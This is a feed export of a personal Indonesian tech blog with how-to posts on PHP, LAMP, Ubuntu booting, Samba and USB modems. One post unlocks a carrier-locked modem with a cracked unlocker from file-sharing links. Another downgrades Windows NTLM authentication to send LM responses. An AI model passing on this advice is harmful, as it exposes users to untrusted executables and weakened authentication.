tag:blogger.com,1999:blog-85596815781135087622011-11-29T08:49:11.933+07:00ISIC Pekanbaruyudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.comBlogger811100tag:blogger.com,1999:blog-8559681578113508762.post-64976753955752733662011-11-29T08:45:00.001+07:002011-11-29T08:47:28.442+07:00Summary from centos official - #<br /><br />This guide describes how to upgrade the standard PHP 5.1.x packages in CentOS 5.x 32-bit to the current development versions 5.2.x. These instructions were created using CentOS 5.3 32-bit and with the following PHP packages installed: <br /><br /># rpm -qa |grep php<br /><br />&nbsp;php-common-5.1.6-15.el5.i386<br />&nbsp;php-cli-5.1.6-15.el5.i386<br />&nbsp;php-5.1.6-15.el5.i386<br />&nbsp;php-pdo-5.1.6-15.el5.i386<br />&nbsp;php-bcmath-5.1.6-15.el5.i386<br />&nbsp;php-ldap-5.1.6-15.el5.i386<br />&nbsp;php-devel-5.1.6-15.el5.i386<br />&nbsp;php-gd-5.1.6-15.el5.i386<br />&nbsp;php-xml-5.1.6-15.el5.i386<br />&nbsp;php-mbstring-5.1.6-15.el5.i386<br />&nbsp;php-mysql-5.1.6-15.el5.i386<br />&nbsp;php-dba-5.1.6-15.el5.i386<br /><br />As long as you're using the standard PHP packages on your CentOS server you won't need to do anything extra. If you're using extra PHP packages that aren't part of the standard CentOS repositories (like php-mcrypt) you'll have to remove them or find updated versions of them. <br /><br />Add the development repositories<br /><br />First thing we need to do is add the development repositories to yum. When we add the development repository we're going to configure it so it only pulls PHP packages. To start we'll need create a new yum repository configuration file (use your favorite editor): <br /><br />&nbsp;# /etc/yum.repos.d/CentOS-Testing.repo<br /><br />Copy/paste the following into this file: <br /><br />&nbsp; # CentOS-Testing:<br />&nbsp; # !!!! CAUTION !!!!<br />&nbsp; # This repository is a proving grounds for packages on their way to CentOSPlus and CentOS Extras.<br />&nbsp; # They may or may not replace core CentOS packages, and are not guaranteed to function properly.<br />&nbsp; # These packages build and install, but are waiting for feedback from testers as to<br />&nbsp; # functionality and stability. Packages in this repository will come and go during the<br />&nbsp; # development period, so it should not be left enabled or used on production systems without due<br />&nbsp; # consideration.<br />&nbsp; [c5-testing]<br />&nbsp; name=CentOS-5 Testing<br />&nbsp; baseurl=http://dev.centos.org/centos/$releasever/testing/$basearch/<br />&nbsp; enabled=1<br />&nbsp; gpgcheck=1<br />&nbsp; gpgkey=http://dev.centos.org/centos/RPM-GPG-KEY-CentOS-testing<br />&nbsp; includepkgs=php*<br /><br />Make sure to remove any spaces at the start of each line, then save and close the file and you're done. <br /><br />Update PHP packages<br /><br />Before updating your PHP packages you'll want to get a list of what you currently have installed. To get a list of current PHP packages run the following: <br /><br />&nbsp;# rpm -qa |grep php<br /><br />Now you can use yum to update the PHP packages on your system: <br /><br />&nbsp;# yum update<br /><br />You should be shown a list of packages that are going to be updated. Compare it to the list of PHP packages on your system. Note any packages that are not in the list. You'll need to remove these packages or find updates for them because they won't work after you update to PHP 5.2.x. If that is acceptable type "y" to continue and let yum update the packages. <br /><br />Once yum has completed restart Apache: <br /><br />&nbsp;# service httpd restart<br /><br />To verify the update is working create a simple testing.php in your www directory with the following source code: <br /><br /><!--?php<br-->&nbsp; phpinfo();<br />?&gt;<br /><br />and open it in a web browser. The new PHP version should be reflected at the top of the page. <br /><br />Conclusion<br /><br />You should now have PHP 5.2.6 running on CentOS 5.3 32-bit. <br /><br />&nbsp;# rpm -qa |grep php<br /><br />&nbsp; php-cli-5.2.6-2.el5s2<br />&nbsp; php-mbstring-5.2.6-2.el5s2<br />&nbsp; php-devel-5.2.6-2.el5s2<br />&nbsp; php-pdo-5.2.6-2.el5s2<br />&nbsp; php-gd-5.2.6-2.el5s2<br />&nbsp; php-dba-5.2.6-2.el5s2<br />&nbsp; php-common-5.2.6-2.el5s2<br />&nbsp; php-bcmath-5.2.6-2.el5s2<br />&nbsp; php-xml-5.2.6-2.el5s2<br />&nbsp; php-pear-1.5.1-2.el5s2<br />&nbsp; php-ldap-5.2.6-2.el5s2<br />&nbsp; php-5.2.6-2.el5s2<br />&nbsp; php-mysql-5.2.6-2.el5s2<br /><br /><br />&nbsp;# php -v<br /><br />&nbsp; PHP 5.2.6 (cli) (built: Sep 15 2008 20:42:05)<br />&nbsp; Copyright (c) 1997-2008 The PHP Group<br />&nbsp; Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies<br /><br />Note: If your "php -v" output returns errors about PDO or JSON click here <br /><br />Extras<br /><br />Updating/Installing mcrypt<br /><br />If you have php-mcrypt for PHP 5.1.x installed you'll want to remove it: <br /><br />Note: Your version number maybe different. Alter below command accordingly. <br /><br />&nbsp;rpm -e php-mcrypt-5.1.6-15.el5.centos.1<br /><br />Download php-mcrypt for PHP 5.2.x and install it. You can find a 32-bit php-mcrypt package here FedoraJunkies. <br /><br />Note: You'll notice the "--nodeps" flag in the example. When you try to install php-mcrypt without it you get an error that php-common-5.2.6-2.el5s2 is missing even though it is installed. <br /><br />&nbsp;wget -c http://sourcemirrors.org/scotth/centos/5/php/php-mcrypt-5.2.6-2.i386.rpm<br />&nbsp;rpm -i --nodeps php-mcrypt-5.2.6-2.i386.rpm<br /><br />Restart Apache and you should now see mcrypt information on your testing.php page. <br /><br />JSON and PDO being loaded twice<br /><br /><br />When you run the command "php -v" you might see the following errors: <br /><br />&nbsp;# php -v<br /><br />&nbsp; PHP Warning:&nbsp; Module 'json' already loaded in Unknown on line 0<br />&nbsp; PHP Warning:&nbsp; Module 'PDO' already loaded in Unknown on line 0<br />&nbsp; PHP 5.2.6 (cli) (built: Sep 15 2008 20:42:05)<br />&nbsp; Copyright (c) 1997-2008 The PHP Group<br />&nbsp; Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies<br /><br />This is caused by the following two lines in the /etc/php.ini file: <br /><br />; Extension JSON<br />extension=json.so<br /><br />; Extension PDO<br />extension=pdo.so<br /><br />Comment out these lines by adding a ";" in front of "extension=". These two modules are already loaded via these two files: <br /><br />/etc/php.d/json.ini<br />/etc/php.d/pdo.ini<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6497675395575273366?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-71771990285557766362011-10-04T10:51:00.000+07:002011-10-04T10:51:44.663+07:00LAMP tersedia di repo ubuntu standard bawaan Lucid.<br />Berikut langkah-langkah proses instalasi yang bisa di lakukan.<br /><b><br />Install Apache</b><br />sudo apt-get install lamp-server^ (gunakan “^”)<br />lalu ikuti proses instalasinya.. atau dapat pula menggunakan cara :<br /><pre>&nbsp;</pre><pre>sudo apt-get install apache2</pre><span id="more-182"></span><br />Untuk meyakinkan apakah instalasi Apache sudah berhasil atau belum.. dapat dilakukan pengetesan melalui browser dengan mengarahkan ke link berikut :<br /><pre>&nbsp;</pre><pre>http://localhost</pre><br />Bila muncul seperti gambar berikut berarti proses instalasi Apache webserver berhasil.<br /><a href="http://kusumartono.files.wordpress.com/2010/06/gb01.png"><img alt="" class="aligncenter size-medium wp-image-184" height="240" src="http://kusumartono.files.wordpress.com/2010/06/gb01.png?w=300&amp;h=240" title="gb01" width="300" /></a><br /><br /><b>Install PHP</b><br />1. Buka konsol dari terminal kemudian ketikkan command berikut :<br /><pre>sudo apt-get install php5 libapache2-mod-php5</pre><br />2. Restart webserver dengan menggunakan command :<br /><pre>sudo /etc/init.d/apache2 restart</pre><br /><b>Test PHP</b><br />1. Buat file <i>testing.php</i> pada direktori <i>/var/www/</i> dengan cara<br /><pre>sudo vim /var/www/testing.php</pre><br />2. Edit file tersebut dengan menambahkan<br /><pre>&lt; ?php phpinfo(); ?&gt;<br /></pre><br />3. Cek pada browser ke dengan alamat :<br /><pre>http://localhost/testing.php</pre>Bila instalasi PHP berjalan dengan baik maka akan muncul seperti pada gambar berikut :<br /><a href="http://kusumartono.files.wordpress.com/2010/06/gb02.png"><img alt="" class="aligncenter size-medium wp-image-192" height="240" src="http://kusumartono.files.wordpress.com/2010/06/gb02.png?w=300&amp;h=240" title="gb02" width="300" /></a><br /><br /><br /><b>Install MySQL</b><br />1. Install MySQL dari terminal dengan menggunakan :<br /><pre>sudo apt-get install mysql-server</pre><br />2. Edit file <i>/etc/mysql/my.cnf</i> dengan menggunakan <i>vim</i><br /><pre>sudo vim /etc/mysql/my.cnf</pre>Kemudian rubah pada baris <br /><pre>bind-address = 127.0.0.1</pre><br />menjadi :<br /><pre>bind-address = ip_address_anda</pre><br />3. Membuat user <i>root</i> pada MySQL dari terminal :<br /><pre>mysql -u root<br />mysql&gt; SET PASSWORD FOR 'root'@'localhost' = PASSWORD('passwordanda');</pre>Rubah <i>passwordanda</i> dengan password yang anda inginkan.<br /><br />4. Install aplikasi phpMyadmin agar memudahkan kita dalam mengedit database.<br /><pre>sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin </pre><br />Selanjutnya agar PHP dapat bekerja dengan MySQL edit file <i>php.ini</i> :<br /><pre>sudo vim /etc/php5/apache2/php.ini</pre><br />Rubah baris berikut :<br /><pre>;extension=mysql.so</pre>menjadi :<br /><pre>extension=mysql.so</pre><br />Kemudian restart Apache anda :<br /><pre>sudo /etc/init.d/apache2 restart</pre><br /><i>have a nice day..&nbsp;</i><br /><br /><i>re+ thanks bro.. </i><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7177199028555776636?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-84114554372121659042011-02-04T10:38:00.002+07:002011-02-04T10:38:49.254+07:00sejak beberap bulan yang lalu saya mencari-cari problem yang terjadi di Laptop Toshiba seri Satellite L510 intel core i3 (karena tidak ada linux/kernel yang support dengan vga, chipset dan processornya) &amp; ( Kernel iDeneb macOSX pun gagal total). selama punya laptop ini kondisinya sangat memprihatinkan, karena hanya bisa di install OS Windows 7 (no XP) &amp; jajaran program applikasinya. Kondisi ini sangat kurang lengkap dengan adanya pekerjaan dibidang Network &amp; programming yang tidak bisa maksimal. Alhasil VirtualBox menjadi satu-satunya cara untuk dapat install Opensource (linux &amp; solaris &amp; BSD ) sebagai sarana jembatan ke network &amp; server yang saya bangun.<br /><br />Alhasil, diakhir bulan januari kmarin permasalahan itupun selesai dengan coba untuk oprek-oprek system linux yang akan digunakan dengan mengandalkan teori lama. akan saya sharing beberapa trik yg saya pakai untuk mengatasi agar Toshiba L510 intel core i3 dapat berjalan mulus di linux ubuntu ( ujicoba pertama ) :<br /><br />1. siapkan CD Installasi UBUNTU 10.10<br />2. Pasang booting laptop via CDROM<br />3. saat loading booting awal PRESS F6 (UNTUK PILIH LANGUAGE)<br />4. kemudia PRESS F6 lagi untuk memunculkan menu boot lalu pilih "acpi=off"<br />5. kemudian ikuti langkah installasinya seperti biasa<br />6. setelah selesai installasi, saat booting PRESS "E" lalu akan keluar menu boot baru<br />7. pilih line: Linux /boot/vmlinux-2.6.32......root=UID... PRESS "END" dari keyboard dan tambahkan dibaris paling akhirnya "acpi=off"<br />8. PRESS Ctrl+X dan kemudian boot<br />9. akhirnya sampai juga di Ubuntu Desktop (perjuangan belum selesai)<br />10.&nbsp; buka "terminal" : Applications &gt; Accessories &gt; Terminal "<br />11. edit grub.conf dengan cara : <br />~$ sudo -i<br />~$ nano /boot/grub/grub.cfg&nbsp;&nbsp; (enter)<br />12. cari baris ini :<br />### BEGIN /etc/grub.d/10_linux ###<br />menuentry 'Ubuntu, with Linux 2.6.35-25-generic' --class ubuntu --class gnu-linux --class gnu --class os {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; recordfail<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; insmod part_msdos<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; insmod ext2<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; set root='(hd0,msdos4)'<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; search --no-floppy --fs-uuid --set cc4dfdfd-f860-494f-9aab-91f7397d8585<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; linux&nbsp;&nbsp; /boot/vmlinuz-2.6.35-25-generic root=UUID=cc4dfdfd-f860-494f-9aab-91f7397d8585 ro&nbsp;&nbsp; quiet splash acpi=off (ditambahkan acpi=off)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; initrd&nbsp; /boot/initrd.img-2.6.35-25-generic<br />}<br /><br />13. setelah ditambahkan "acpi=off" seperti contoh diatas PRESS CTRL+X - Yes<br />14. Restart Linux anda. <br />15. eng-ing-eng.. sudah siap perkerjaan kita, catatan: jangan lupa update grub bila sudah ada waktu : ~#apt-get update-grub<br />16. Heppy ending <br /><br />Semoga cara diatas dapat berjalan baik pula di system anda &amp; kemungkinan bisa diaplikasikan di beberapa linux lain yang ingin anda install di Toshiba core i3. <br /><br />nantikan selanjutnya Install MacOSX ke Toshiba core i3.<br /><br />Thank all<br /><br />Regard<br />yudhax<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-8411455437212165904?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-8935303582111667302011-02-04T10:37:00.002+07:002011-02-04T10:37:51.895+07:00<h3 class="post-title entry-title"> </h3><div class="post-header"> </div><div class="post-body entry-content"> <div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_-_ze5jbhUuc/TUjz0ewV5RI/AAAAAAAAAKc/2plRNF17p50/s1600/crack+modem+im2.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/TUjz0ewV5RI/AAAAAAAAAKc/2plRNF17p50/s320/crack+modem+im2.JPG" width="320" /></a></div><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost">Pernah berlangganan im2 modem internet access?</span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost"><br /></span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost">dulu saya pernah, 2-3 tahun yang lalu modem ini "most wanted" org pada suka dan mencarinya, tetapi dengan berjalannya waktu, modem dari paket bundling perusahaan indos*t ini berstatus lock/terkunci. jadi tidaka akan bisa dipakai lagi kalau anda berhenti berlangganan dari paket im2. so... bagaimana mengatasinya?</span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost"><br /></span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost">demikian kisahnya:</span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost"><br />berikut langkah2 meng-unlock modem 3G ZTE-MF622:<br /><b><br /></b></span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost"><b>1.</b> Downlot program <b>DC - Unlocker</b> dari salah satu link di bawah ini:</span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost"><br /></span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost">(dapat referensi dari blog kipul)<br />- http://www.mediafire.com/?lzlekm4lzby<br />- http://rs968.rapidshare.com/files/377202221/dccrap.zip<br /><br /><b>2.</b>&nbsp;Selanjutnya anda bisa hubungkan Modem 3G ZTE MF622 ke PC, tapi sebelumnya ganti kartu GSM IM2nya dengan kartu GSM apa aja selain dari operator Indosat, misalkan axis, telkomsel atau XL (<b><span style="color: red;">PENTING</span></b>).<br /><b>3.</b> Ketika muncul program load dashboard modem berlogo IM2 close saja semuanya, langsung ditutup saja.</span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"> <span class="fullpost"><b>4.</b> Ekstrak file yg sudah di download td&nbsp;<b>unlock modem dccrap.zip</b>.<br /><b>5.</b> Masuk ke dalam folder "unlock modem dccrap", kemudian jalankan program <b>dccrap.exe</b><br /><b>6.</b> Ganti opsi Select Manufacturer nya menjadi <b>ZTE</b> dan ganti juga opsi Select Modelnya menjadi <b>_Auto detect</b><br /><b>7.</b> Klik pada icon kaca pembesar dibawah, hingga kolom di bawah muncul tulisan:<br /><br />DC - Unlocker 2 Client 1.00.0460<br /><br />Detecting card :<br /><br />selection :<br />manufacturer - ZTE datacards<br />model - Auto detect<br /><br />Found modem : MF330<br />Model : ZTE MF622<br />IMEI : ..............<br />Firmware : ..............<br />SIM Lock status : locked<br /><br /><br /><b>8.</b> Terakhir, klik pada tombol Unlock (disebelah kanan atas), hingga muncul tulisan:<br /><br />Unlocking, please wait ...<br /><br />Card successfully unlocked !<br /><br />Credits left : 1428100<br /><br />Success ... setelah proses selesai.&nbsp;Cabut modem 3G ZTE MF622 dari PC, kemudian restart komputer anda. dan sekarang, anda bisa memanfaatkan modem 3G ZTE MF622 kamu dengan kartu operator lain. good luck</span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost"><br /></span></span><br /><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span class="fullpost">yudhax</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-893530358211166730?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-37294533037903255812011-02-04T10:36:00.000+07:002011-02-04T10:36:36.160+07:00&nbsp;Modem telkomsel flash seri E1775 / E1552 / E620<br /><br />1. download : ( di http://packages.ubuntu.com/lucid/i386/usb-modeswitch/download )<br />ex:<br />~#wget http://debian.nctu.edu.tw/ubuntu//pool/universe/u/usb-modeswitch/usb-modeswitch_1.1.0-2_i386.deb<br /><br />data modeswitch : (http://packages.ubuntu.com/lucid/all/usb-modeswitch-data/download )<br />ex:<br />~#wget http://www.club.cc.cmu.edu/pub/ubuntu//pool/universe/u/usb-modeswitch-data/usb-modeswitch-data_20100127-1_all.deb<br /><br /><br />2. Install :<br /><br /># dpkg -i usb-modeswitch_1.1.0-2_i386.deb<br /># dpkg -i usb-modeswitch-data_20100127-1_all.deb<br /><br />3. Masukkan Modem Huawei.<br /><br />4. masuk ke : System --&gt; Preference --&gt; Network Connections --&gt; Mobil Broadband --&gt; Add --&gt; pastikan modem huaweinya sidah terditeksi --&gt; Forward --&gt; Country (indonesia) --&gt;&gt; Profider Telkomsel --&gt; Select Plan (pilih my plan not listen) --&gt; isi APN dengan "internet" (tanpa kutip") --&gt; Apply<br /><br />5. Klik Connect automatically<br />Number = *99#<br />username = (kosong)<br />password = (kosong)<br />APN = internet<br />Available to all user = cecklist<br /><br />APPLY<br /><br />6. Oke happy enjoy ..<br /><br />7. untuk matikan &amp; hidupkan koneksi nya : klik kanan tanda wireless/connection network diatas lalu ada pilihan " enable mobile broadband " (v) jika aktif &amp; hilangkan (v) jika off<br /><br />yudhax<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3729453303790325581?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-55463433274587849232011-01-01T13:11:00.000+07:002011-01-01T13:11:15.126+07:00<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_-_ze5jbhUuc/TR7FZnFkP1I/AAAAAAAAAJ4/NhvLwd7xyzQ/s1600/yudhax+news+ipad.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/TR7FZnFkP1I/AAAAAAAAAJ4/NhvLwd7xyzQ/s320/yudhax+news+ipad.jpg" width="320" /></a></div><br />IPad Apple may soon have a new home: the United States House of Representatives.<br />Floor of the House of Representatives is technology-free zone. Traditionalists have argued that technological devices of any kind in space that can be very annoying, especially with so many members in the Parliament at the same time. <br />However, lately Rep. Henry Cuellar (D-Texas) took to the podium speakers IPAD and, in doing so, may have changed the course of history in the House of Representatives.<br />In an interview with iPadDailyNews on Thursday, Cuellar explain his thoughts on using IPAD. <br />"If you look at the technology available, both leveraged Congress can make us more efficient," said Cuellar. "There's a lot of information immediately so we can get together with the iPad." <br />He said the device can be used to conduct research on the floor in real time or download bills. "Just from the standpoint of making decisions more effective and efficient technologies that valuable," said Cuellar. <br />As you would expect, Cuellar criticized for bringing the iPad to the House, but apparently the device will be allowed to stay. Not only the rules of House of Parliament that the iPad not break the rules, new proposals can be sure will be around for a long time. <br />According iPadDailyNews, incoming House Speaker John Boehner (R-Ohio) has proposed allowing "certain electronic devices, including the iPad the House floor, as long as it does not 'interfere with decency." <br /><br />whether it also will become part of the system of governance in Indonesia? we'll see.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-5546343327458784923?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com1tag:blogger.com,1999:blog-8559681578113508762.post-51753180615178058172010-12-04T22:47:00.000+07:002010-12-04T22:48:49.970+07:00<h2><span class="Apple-style-span" style="font-weight: normal; font-size: 16px; ">Bagaimana cara Yahoo! Mail dapat bertahan melayani jutaan penggunanya yang setiap hari mengirim, mengkompose, dan memanage email mereka, dengan besar total data dalam skala terabyte? Jawab: tambah jumlah komputer!</span></h2> <p style="">Coba login ke <a href="http://mail.yahoo.com/">mail.yahoo.com</a>, dan perhatikan URL email anda. Punya saya ada di <a href="http://us.f98.mail.yahoo.com/">http://us.f98.mail.yahoo.com</a>. Catat punya Anda. Log out, lalu login lagi. URL-nya masih sama? Sekarang coba orang lain yang login, URL-nya berbedakah? Ya. Ini karena Yahoo! Mail menerapkan <b>separasi komputer server email berdasarkan account</b>. Setiap registrasi account email Yahoo, akan diassign ke salah satu server di dalam farm server email, yang hitungan terakhir berdasarkan <a href="http://netcraft.org/">netcraft.org</a>, ada 200 lebih! Tentunya strategi ini adalah lebih baik daripada strategi load-balancing standar. Karena dengan separasi, seluruh data yang berhubungan dengan account sifatnya lokal.</p> <p style="">Selain email, Yahoo juga melakukan separasi web server berdasarkan tipe file. Yakni, file-file image/gambar diletakkan terpisah di server lain (<a href="http://yimg.com/">yimg.com</a>), dan terpisah secara geografis. Kemungkinan di high-capacity bandwidth hosting seperti Akamai. Tujuannya tentunya adalah mengurangi beban bandwidth Yahoo. Juga, dengan pemisahan ini dimungkinkan penggunaan software webserver yang berbeda. File-file statik bisa diserve dengan jenis webserver tertentu yang kecil dan minimal misalnya.</p> <p style="">Yahoo juga memisahkan komputer server berdasarkan aplikasi. Contoh: 8 server untuk <a href="http://www.yahoo.com/">www.yahoo.com</a>, 1 server untuk Yahoo! Auction, 1 server untuk Yahoo! Autos, 1 server untuk Yahoo! Finance, dan seterusnya.</p> <a name="sub14"></a><h2>Membuat Server Redundan</h2> <p class="Normal-first" style=""><b>Availability</b> adalah faktor utama bagi situs yang sibuk, sampai-sampai down time sesaat pun adalah sebuah dosa besar. Yahoo! tidak tanggung-tanggung menyediakan 5 dedicated name server hanya untuk tujuan meresolve nama domainnya. Ia juga melakukan round robin 8 webserver hanya untuk halaman depan Yahoo. Nama domainnya pun telah dibeli sampai dengan 2010 (dan mungkin diperpanjang jauh-jauh hari sebelum kadaluarsa, untuk menghindari risiko). Lihat Tabel 1. Begitu pula Google, dengan 4 name server, dan 9 webserver. Redundansi ini menjamin kelangsungan hidup situs mereka—yang mana adalah hidup mati mereka.</p> <a name="sub15"></a><h2>Kesimpulan</h2> <p class="Normal-first" style="">Banyak hal teknis yang bisa dipelajari dari dotcom besar, hanya dengan melihat apa yang tampak dan tersedia dengan gratis. Dari source code HTML yang memperlihatkan keterampilan trik-trik browser yang matang. Dari desain web situs yang memperlihatkan pemikiran user experience. Dari interaksi cookie yang memperlihatkan sebagian teknik pemrograman terdistribusi mereka. Dan macam-macam hal lain yang walaupun pada awalnya terkesan aneh, tapi sangat masuk akal bila konteksnya masif—dan kepuasan pengunjung dotcom adalah hidup mati sebuah perusahaan.</p> <p class="MsoNormal" style=""><i>Dody Suria Wijaya pendiri <a href="http://failco.com/">failco.com</a> dan <a href="http://usable.web.id/">usable.web.id</a>.</i><i> Saat ini tengah sibuk memanage kantornya di bilangan </i><i>Taman</i><i> Radio Dalam dan menyusun sebuah naskah buku.</i><i> Dapat dihubungi di <a href="mailto:dody.wijaya@usable.web.id">dody.wijaya@usable.web.id</a>.</i></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-5175318061517805817?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-46885005352343291272010-11-01T11:32:00.001+07:002010-11-01T11:35:09.788+07:00<h5>How to Configure Samba From the Command Line</h5> <p>1. <b>Open a Terminal and assume the root role.</b><br />2. <b>Copy the example file to the smb.conf file and open it with an editor.</b></p> <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent"> <pre class="code-java"># cd /etc/sfw # cp smb.conf-example smb.conf # vi smb.conf </pre> </div></div> <p>3. <b>To make the setting active, remove any settings that begin with ";", as these are disabled. The template includes full comments for each setting.</b><br />4. <b>Modify are the following settings:</b></p> <ul> <li><span class="error">[global]</span> <ul> <li>workgroup = Change to your WORKGROUP.</li> </ul> </li> <li><span class="error">[homes]</span> <ul> <li>path = Add your path to your home directories ( /export/home/%u ).</li> <li>browsable = Change to yes to allow the home share to be seen by the browser service.</li> </ul> </li> </ul> <p>5. <b>Use the smbpasswd command to add your username.</b> </p> <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent"> <pre class="code-java"># smbpasswd -a <username> New SMB password: Re-Type New SMB Password: Added user <username> </pre> </div></div> <p><b>You are ready to start Samba.</b></p> <h5><a name="HowtoSetUpSambaintheOpenSolaris2009.06Release-HowToStartSamba"></a>How To Start Samba</h5> <p>1. <b>Enable the samba and wins services.</b></p> <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent"> <pre class="code-java"># svcadm enable samba # svcadm enable wins </pre> </div></div> <p>2. <b>Check that the daemons are online:</b><br /><b>For example:</b></p> <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent"> <pre class="code-java"># svcs -a| grep wins online 16:06:20 svc:/network/wins:<span class="code-keyword">default</span> # svcs -a | grep samba online 16:06:20 svc:/network/samba:<span class="code-keyword">default</span> </pre> </div></div> <p><b>You should now be able to access your home directory and your printers from your Windows client.</b></p> <p><b>If you've set browsable = yes in your smb.conf file, you should see the shares in Network Neighborhood.</b></p> <p><b>Alternatively, you could map your home directory to always mount at login.</b></p><p><b><br /></b></p><p><b>note: wiki SUN</b></p><p><b>yudhax</b></p><p><b><br /></b></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-4688500535234329127?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-32740975786379358752010-11-01T11:29:00.003+07:002010-11-01T11:32:20.580+07:00<div>Special Notice for Windows Vista and Windows 7 Users</div><div><br /></div><div>Microsoft Knowledge Base Article ID 954387</div><div><span class="Apple-tab-span" style="white-space:pre"> </span>Note</div><div>For certain versions of Vista and Windows 7, Microsoft changed the default security profile for NTLM authentication, this in effect breaks Samba.</div><div><br /></div><div>To fix this problem, follow these steps:</div><div><br /></div><div> 1. Select Start > Run and type secpol.msc.</div><div> 2. Navigate to Local Policies > Security Options</div><div> 3. Right Click "Network Security: LAN Manager authentication level" and select Properties.</div><div> 4. Select "Local Security Settings".</div><div> 5. Change the Policy to "Send LM &amp; NTLM - user NTLMV2 session security if negotiated".</div><div> 6. Click OK and quite the Security Policy Editor.</div><div> 7. Log out and then back in or reboot your system.</div><div><br /></div><div>You should now be able to access your Samba shares and printers.</div><div><br /></div><div>hope this note can help you.</div><div><br /></div><div>note: wiki SUN Oracle</div><div>yudhax</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3274097578637935875?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-85768066090379135272010-03-09T09:13:00.002+07:002010-03-09T09:23:20.806+07:00<span style="font-family:verdana;">SERI : DI-LB604 4-Port Load Balancing Router (standar)</span> <span style="font-family:verdana;"><br />SERI: DFL-800 NetDefend Network Security UTM Firewall, 2 WAN, 1 DMZ, 7 LAN, 90-Day IPS/AV/WCF Subscription (more better)<br />-0------------0----------------0--------------0-------------<br /></span> <h4 style="margin-bottom: 5px; font-weight: normal; font-family: verdana;"><span style="font-size:85%;">Description </span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://images.dlink.com/new/products/DI-LB604/DI-LB604_right.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 318px; height: 242px;" src="http://images.dlink.com/new/products/DI-LB604/DI-LB604_right.png" alt="" border="0" /></a></h4><h4 style="margin-bottom: 5px; font-weight: normal; 